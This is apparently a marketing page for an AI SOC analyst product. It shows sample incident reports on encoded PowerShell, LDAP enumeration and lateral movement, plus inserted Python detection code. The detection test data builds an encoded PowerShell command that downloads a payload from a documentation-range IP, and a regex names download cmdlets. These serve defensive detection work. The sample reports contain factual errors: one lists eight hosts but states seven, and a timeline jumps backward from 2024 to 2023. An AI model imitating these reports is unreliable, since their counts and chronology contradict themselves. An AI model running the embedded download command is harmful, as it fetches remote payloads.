See AI SOC Analyst in Action
Discover how SOC Jedi.AI revolutionizes cybersecurity operations with advanced AI-driven investigations. From automating routine tasks to providing deep threat insights, explore how organizations like yours can transform their SOC performance.
See How SOC Jedi.AI Delivers Actionable Insights with Every Investigation
The Future of Incident Investigations
Modern cybersecurity demands faster, smarter, and more adaptive investigation processes. SOC Jedi.AI empowers your SOC team by combining precision, automation, and actionable insights to tackle evolving threats efficiently. Step into the next generation of incident response.
Tailored Reports for SOC Tiers
Provide customized reports designed for L1, L2, and other SOC tiers.

Each report is curated to meet the specific needs of analysts, ensuring clarity and actionable insights.
Actionable Insights Within Reports
Enable swift response with built-in automatic and semi-automatic actions directly accessible in the report interface.

Reduce MTTR and improve operational efficiency with just a few clicks.
Threat Detailing for Deep Analysis
Access comprehensive threat intelligence, including detailed malware descriptions, attack chain reconstruction, and potential consequences.

Equip your team with the data needed to understand and mitigate risks effectively.
Use Cases
SOC Jedi.AI is an advanced AI SOC Analyst that transforms how incident investigations are conducted in cybersecurity. By integrating cutting-edge technology, SOC Jedi.AI delivers fast and accurate investigations, enabling your SOC team to focus on high-value tasks rather than routine work.
An example of investigating suspicious PowerShell commands executed on a compromised node, identifying the attack chain and impacted accounts, and providing recommended actions to mitigate the threat.
Incident Investigation Report

Executive Summary
On 2024.03.18, multiple suspicious activities were detected on the workstation ALPHA-WS-001, associated with user j_smith. These activities involved the execution of encoded PowerShell commands and connections to an external IP address, indicating a potential security breach.

Incident Details
1. Affected Systems and Accounts
  • Workstation: ALPHA-WS-001 (compromised)
  • User Account: j_smith (potentially compromised)
  • External IP: 203.0.113.100 (suspected command-and-control server)
2. Chronological Event Sequence
  • 2024.03.18 14:32:56: Detection of a Base64-encoded PowerShell process on ALPHA-WS-001
  • 2024.03.18 14:33:00: ALPHA-WS-001 established a TCP connection with 203.0.113.100
  • 2024.03.18 14:33:56: User j_smith executed an encoded PowerShell command to download a payload from 203.0.113.100:8080

3. Technical Analysis
The incident involved:
  • Execution of Base64 encoded PowerShell commands
  • Network connection to a suspicious external IP address
  • Download of potentially malicious payload

Risk Assessment
Severity: INCIDENT
Impact: Potential data exfiltration, system compromise, and lateral movement within the network

Recommended Actions
1. Immediate Response
  • Isolate ALPHA-WS-001 from the network to contain the threat
  • Conduct comprehensive traffic analysis and log examination
  • Update all endpoint security solutions across the network
2. User and Account Management
  • Contact j_smith to verify whether the actions were legitimate
  • Reset credentials for the j_smith account
  • Notify all users about the potential compromise
  • Conduct an organization-wide security awareness briefing
3. Forensic Investigation
  • Perform in-depth forensic analysis on ALPHA-WS-001
  • Determine the full extent of the attack and potential data compromise
4. Security Enhancements
  • Review and update security policies and monitoring rules
  • Implement additional security measures to prevent similar incidents

Conclusion
This incident demonstrates characteristics of a targeted attack, utilizing sophisticated techniques such as encoded commands and potential malware deployment. Swift action is crucial to mitigate risks and prevent further compromise of our systems.
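The detection logic behind a report like the one above, as an added example that is not SOC Jedi.AI's own code: it decodes PowerShell `-EncodedCommand` payloads (Base64 of UTF-16LE text), looks for download cmdlets in the decoded text, and correlates the process event with an outbound connection from the same host to a non-internal address within a short window. The event schema, the sample telemetry and the "internal" address ranges are constructed assumptions.

```python
import base64
import ipaddress
import re
from datetime import datetime, timedelta

TS_FMT = "%Y.%m.%d %H:%M:%S"
# PowerShell's -EncodedCommand (short forms -e, -ec, -enc) carries Base64 of UTF-16LE text.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD = re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|Net\.WebClient", re.I)
# Ranges assumed internal; ipaddress.is_global would reject 203.0.113.100 (a documentation range).
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

def sample_events():
    """Constructed process and network telemetry mirroring the report's timeline (not real data)."""
    enc = base64.b64encode(
        "Invoke-WebRequest -Uri http://203.0.113.100:8080/ -OutFile $env:TEMP\\p.bin".encode("utf-16-le")).decode()
    return [
        {"ts": "2024.03.18 14:32:56", "host": "ALPHA-WS-001", "user": "j_smith", "type": "process",
         "cmdline": "powershell.exe -NoP -W Hidden -enc " + enc},
        {"ts": "2024.03.18 14:33:00", "host": "ALPHA-WS-001", "user": "j_smith", "type": "network",
         "dst": "203.0.113.100", "dport": 8080},
    ]

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, or None if the command line is not encoded."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # flag present but payload is not valid Base64/UTF-16LE

def investigate(events, window=timedelta(minutes=2)):
    """One finding per encoded PowerShell command, correlated with an outbound connection to a non-internal address."""
    findings = []
    for ev in (e for e in events if e["type"] == "process"):
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is None:
            continue
        t0 = datetime.strptime(ev["ts"], TS_FMT)
        remote = next((f'{n["dst"]}:{n["dport"]}' for n in events if n["type"] == "network"
                       and n["host"] == ev["host"]
                       and not any(ipaddress.ip_address(n["dst"]) in net for net in INTERNAL)
                       and timedelta(0) <= datetime.strptime(n["ts"], TS_FMT) - t0 <= window), None)
        findings.append({"host": ev["host"], "user": ev["user"], "decoded": decoded, "remote": remote,
                         "downloader": bool(DOWNLOAD.search(decoded)),
                         "severity": "INCIDENT" if remote else "SUSPICIOUS"})
    return findings
```

An encoded command with no matching external connection is still returned, downgraded to SUSPICIOUS, so an analyst can review the decoded text before dismissing it.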
An example of analyzing a security incident involving LDAP queries and domain information gathering using SharpHound, identifying the attack chain, impacted accounts, and suggesting immediate and long-term security measures.
Incident Investigation Report

Executive Summary
On 2024.03.18, suspicious activities were detected on the corporate network involving unauthorized domain information gathering and multiple LDAP queries. This report details the incident, its potential impact, and recommended actions for mitigation and prevention.

Incident Details
1. Affected Systems and Accounts
  • Workstation: ALPHA-WS-042 (192.168.10.75)
  • Domain Controller: OMEGA-DC-001 (192.168.1.10)
  • User Account: j_thompson
2. Chronological Event Sequence
  • 2024.03.18 14:59:47: User j_thompson initiated domain information gathering using the BloodHound tool from ALPHA-WS-042.
  • 2024.03.18 14:59:47: Multiple identical LDAP queries executed from ALPHA-WS-042 to OMEGA-DC-001.
  • 2024.03.18 14:59:49: Domain information gathering process completed by user j_thompson.
3. Technical Analysis
The incident involved the use of BloodHound, an Active Directory reconnaissance tool, to collect sensitive domain information. Concurrent LDAP queries suggest potential automated enumeration attempts. These activities indicate a possible attempt to map the network structure and identify potential attack vectors.

Risk Assessment
Severity: INCIDENT
Impact:
  • Potential exposure of sensitive domain structure and user information
  • Risk of privilege escalation and lateral movement within the network
  • Possible data exfiltration or preparation for future attacks

Recommended Actions
1. Immediate Response
  • Isolate ALPHA-WS-042 from the network to prevent further unauthorized actions.
  • Suspend user account j_thompson pending investigation.
  • Preserve all relevant logs and system states for forensic analysis.
2. User and Account Management
  • Conduct a comprehensive review of j_thompson's account activities and permissions.
  • Implement stricter access controls and monitoring for privileged accounts.
  • Enforce multi-factor authentication across all user accounts.
3. Forensic Investigation
  • Perform in-depth analysis of OMEGA-DC-001 logs to identify all actions by j_thompson.
  • Examine ALPHA-WS-042 for indicators of compromise, including malware scans and memory analysis.
  • Review network traffic logs for potential data exfiltration attempts.
4. Security Enhancements
  • Deploy advanced endpoint detection and response (EDR) solutions on all workstations.
  • Implement network segmentation to limit lateral movement capabilities.
  • Enhance logging and alerting mechanisms for suspicious activities, particularly for domain enumeration and mass LDAP queries.
  • Conduct regular security awareness training for all employees, focusing on insider threats and social engineering tactics.

Conclusion
The detected activities represent a significant security risk to the organization's network infrastructure. Immediate action is required to mitigate potential threats and prevent future incidents. Ongoing monitoring and security improvements are essential to maintain the integrity and confidentiality of the corporate network.
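The report above flags a burst of identical LDAP queries from one workstation to the domain controller within two seconds. The following detector, an added example rather than SOC Jedi.AI's own logic, finds that pattern in LDAP search records: for each (source, user, DC) it looks for a sliding window holding at least a threshold number of searches and reports the most-repeated filter. The record layout, sample log and thresholds are constructed assumptions.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

TS_FMT = "%Y.%m.%d %H:%M:%S"

def sample_ldap_log():
    """Constructed LDAP search records mirroring the report (not real data):
    (timestamp, source IP, user, domain controller, search filter)."""
    burst = [("2024.03.18 14:59:47", "192.168.10.75", "j_thompson", "OMEGA-DC-001", "(objectClass=*)")] * 24
    burst += [("2024.03.18 14:59:48", "192.168.10.75", "j_thompson", "OMEGA-DC-001", "(objectClass=group)")] * 6
    # Baseline: an application account resolving single users a few minutes apart.
    baseline = [("2024.03.18 14:10:00", "192.168.10.20", "svc_app", "OMEGA-DC-001", "(sAMAccountName=a_lee)"),
                ("2024.03.18 14:12:30", "192.168.10.20", "svc_app", "OMEGA-DC-001", "(sAMAccountName=b_kim)")]
    return baseline + burst

def detect_enumeration(events, window=timedelta(seconds=5), threshold=20):
    """Return one finding per (source, user, DC) that issued at least `threshold` searches
    inside any `window`; the finding also names the most-repeated filter, because the
    report's signal was many identical queries in the same second."""
    by_key = defaultdict(list)
    for ts, src, user, dc, flt in events:
        by_key[(src, user, dc)].append((datetime.strptime(ts, TS_FMT), flt))
    findings = []
    for (src, user, dc), rows in by_key.items():
        rows.sort()
        for start in range(len(rows)):
            end = start
            while end + 1 < len(rows) and rows[end + 1][0] - rows[start][0] <= window:
                end += 1
            if end - start + 1 >= threshold:
                top, repeats = Counter(f for _, f in rows[start:end + 1]).most_common(1)[0]
                findings.append({"source": src, "user": user, "dc": dc, "count": end - start + 1,
                                 "first": rows[start][0].strftime(TS_FMT), "last": rows[end][0].strftime(TS_FMT),
                                 "top_filter": top, "repeats": repeats, "severity": "INCIDENT"})
                break  # report the first qualifying burst per key
    return findings
```

Tune `threshold` against the normal query rate of service accounts in your environment, or an account like the constructed `svc_app` baseline will start producing findings.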
An example of identifying affected nodes through the analysis of compromised devices, user accounts, and network segments during an incident investigation.
Incident Investigation Report

After analyzing the final document, no new hosts were introduced beyond those previously identified in the analysis of the earlier files.

Final Summary of Distinct Hosts Identified Across All Files

  1. exchange.company.net
  2. backup.company.net
  3. larry.company.net
  4. liam.company.net
  5. george.company.net
  6. dc.company.net
  7. david.company.net
  8. dga-v.cm.com-svc-id.net

This concludes the comprehensive analysis of different hosts mentioned in the security incidents documented across all the files you have uploaded. A total of seven distinct hosts have been identified from the analyzed data.

If you have any more specific inquiries or need further assistance with the data or any other task, feel free to let me know!
An example of reconstructing lateral movements by analyzing interactions and incidents across multiple data sources, identifying potential pathways and methodologies used by unauthorized actors within the network.
Incident Investigation Report

Incident Analysis: Lateral Movement Reconstruction
Based on the comprehensive analysis of available data across multiple sources, we have reconstructed a hypothetical pathway of lateral movements potentially utilized by an unauthorized actor within the network.
This reconstruction is based on the chronological appearance of identified hosts and the contextual information provided in each data source regarding the nature of interactions and incidents involving these systems.

Initial Compromise
2024.04.15 08:13:17 - server01.alpha.local: The attack appears to have originated with multiple failed authentication attempts on server01.alpha.local, potentially indicating a brute-force attack or probing of misconfigured access controls. This system serves as the initial point of compromise.

Secondary Target
2024.04.15 09:37:32 - archive02.alpha.local: The threat actor likely pivoted to archive02.alpha.local, a system potentially housing critical backups or archives. This move suggests an attempt to access sensitive information or leverage backup data for deeper network penetration.

User Workstation Exploitation
a) 2024.04.15 11:02:45 - jsmith.alpha.local
b) 2024.04.15 13:26:28 - agarcia.alpha.local

Interaction with these personal workstations indicates either targeted user account compromise or leveraging of obtained credentials for further lateral movement.

Elevated Access
2023.05.15 16:49:03 - mthompson.alpha.local: The compromise of mthompson.alpha.local suggests escalation to a potentially privileged user account, enabling broader network access and control.

Critical Infrastructure Targeting
a) 2023.05.15 19:22:51 - dc01.alpha.local
b) 2023.05.15 21:45:17 - rjohnson.alpha.local

The final known movements involve dc01.alpha.local (possibly a Domain Controller) and rjohnson.alpha.local, indicating attempts to access core network services and additional user systems. This stage represents the deepest known network penetration, potentially facilitating data exfiltration, credential harvesting, or establishing persistence.